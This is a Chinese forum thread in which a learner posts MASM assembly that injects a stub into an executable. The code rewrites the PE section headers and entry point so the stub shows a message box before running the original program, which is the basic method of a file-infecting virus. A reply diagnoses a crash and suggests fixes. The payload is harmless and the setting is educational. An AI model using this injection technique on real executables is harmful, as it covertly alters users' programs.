嗨。。。

请LZ把代码放出来，这样才容已看出你那里出错。。。

.386
.model flat,stdcall
option casemap:none

include include\windows.inc
include include\kernel32.inc
include include\user32.inc
includelib lib\kernel32.lib
includelib lib\user32.lib

.data
hFile dd 0
szCaption db "test",0
szMessage db "success",0
szMessage1 db "fail",0
szFileName db "test.exe",0
szUser32 db "user32.dll",0
szApiName db "MessageBoxA",0

.code
_main:
  push 02h
  push offset szFileName
  call _lopen
  mov hFile,eax
  
  sub esp,1000h
  mov edi,esp

  push 1000h
  push edi
  push hFile
  call _lread  

  mov eax,[edi+3ch]
  add edi,eax
  assume edi:ptr IMAGE_NT_HEADERS

  mov eax,[edi].OptionalHeader.ImageBase
  mov aOldBase,eax
  mov eax,[edi].OptionalHeader.AddressOfEntryPoint
  mov aOldEntryPoint,eax

  movzx eax,[edi].FileHeader.NumberOfSections
  dec eax
  mov ecx,28h
  mul ecx
  add eax,sizeof IMAGE_NT_HEADERS
  add eax,edi
  mov ebx,eax
  assume ebx:ptr IMAGE_SECTION_HEADER

  mov [ebx].Characteristics,0e0000020h  
  mov eax,[ebx].Misc.VirtualSize
  push eax
  add eax,[ebx].VirtualAddress
  mov [edi].OptionalHeader.AddressOfEntryPoint,eax
  add [ebx].Misc.VirtualSize,offset _m2-offset _m1
  mov eax,[ebx].Misc.VirtualSize
  mov ecx,[edi].OptionalHeader.FileAlignment
  cdq
  div ecx
  inc eax
  mul ecx
  mov [ebx].SizeOfRawData,eax
  mov eax,[ebx].Misc.VirtualSize
  mov ecx,[edi].OptionalHeader.SectionAlignment
  cdq
  div ecx
  inc eax
  mul ecx
  add eax,[ebx].VirtualAddress
  mov [edi].OptionalHeader.SizeOfImage,eax
  push offset szUser32
  call LoadLibraryA
  push offset szApiName
  push eax
  call GetProcAddress
  mov aMessageBoxA,eax

  pop eax
  add eax,[ebx].PointerToRawData
  mov edi,esp

  push FILE_BEGIN
  push eax
  push hFile
  call _llseek
  push offset _m2-offset _m1
  push offset _m1
  push hFile
  call _lwrite
  push FILE_BEGIN
  push 0
  push hFile
  call _llseek
  push 1000h
  push edi
  push hFile
  call _lwrite
  add esp,1000h

  push hFile
  call _lclose
  
  

  push MB_OK or MB_ICONINFORMATION
  push offset szCaption
  push offset szMessage
  push 0
  call MessageBoxA

  ret

_m1:
  call _r
_r:
  pop ebp
  sub ebp,offset _r

  push MB_OK or MB_ICONINFORMATION
  lea eax,szMsg1[ebp]
  push eax
  lea eax,szMsg1[ebp]
  push eax
  push 0
  call aMessageBoxA[ebp]
  mov eax,aOldBase[ebp]
  add eax,aOldEntryPoint[ebp]
  push eax
  ret

  szMsg1 db "退出",0
  aMessageBoxA dd 0
  aOldEntryPoint dd 0
  aOldBase dd 0
_m2:

end _main
我也是刚学罗老板的书，不懂搞头的大了，得罪的地方请大哥原谅。

如果这段代码把_m1:设在_main处，注入代码的记事本就会提示不是win32程序，不知道哪里错了。

只测试注入的文件能不能打开，用OD

我尝试运行你的代码：

.386
.model flat,stdcall
option casemap:none

include include\windows.inc
include include\kernel32.inc
include include\user32.inc
includelib lib\kernel32.lib
includelib lib\user32.lib

.data
hFile dd 0
szCaption db "test",0
szMessage db "success",0
szMessage1 db "fail",0
szFileName db "test.exe",0
szUser32 db "user32.dll",0
szApiName db "MessageBoxA",0

.code
_main:
  push 02h
  push offset szFileName
  call _lopen
  mov hFile,eax
  
  sub esp,1000h
  mov edi,esp
 
  push 1000h
  push edi
  push hFile
  call _lread  

  mov eax,[edi+3ch]
  add edi,eax
  assume edi:ptr IMAGE_NT_HEADERS

  mov eax,[edi].OptionalHeader.ImageBase
  mov aOldBase,eax                        ; 《== 这里就挂了！
..
..
..

一些建议：
- 把 aMessageBoxA， aOldEntryPoint， aOldBase 放在.data里
- 在你的m1程序里改用aaMessageBoxA， aaOldEntryPoint， aaOldBase：

_m1:
  call _r
_r:
  pop ebp
  sub ebp,offset _r

  push MB_OK or MB_ICONINFORMATION
  lea eax,szMsg1[ebp]
  push eax
  lea eax,szMsg1[ebp]
  push eax
  push 0
  call aaMessageBoxA[ebp]
  mov eax,aaOldBase[ebp]
  add eax,aaOldEntryPoint[ebp]
  push eax
  ret

  szMsg1 db "Exit",0
  aaMessageBoxA dd 0
  aaOldEntryPoint dd 0
  aaOldBase dd 0

- 用malloc制造一个储存，然后把你的m1程序写进去
- 用memcpy来把aMessageBoxA写去aaMessageBoxA， 等等。。。
- 过后才把储存写去文件。。。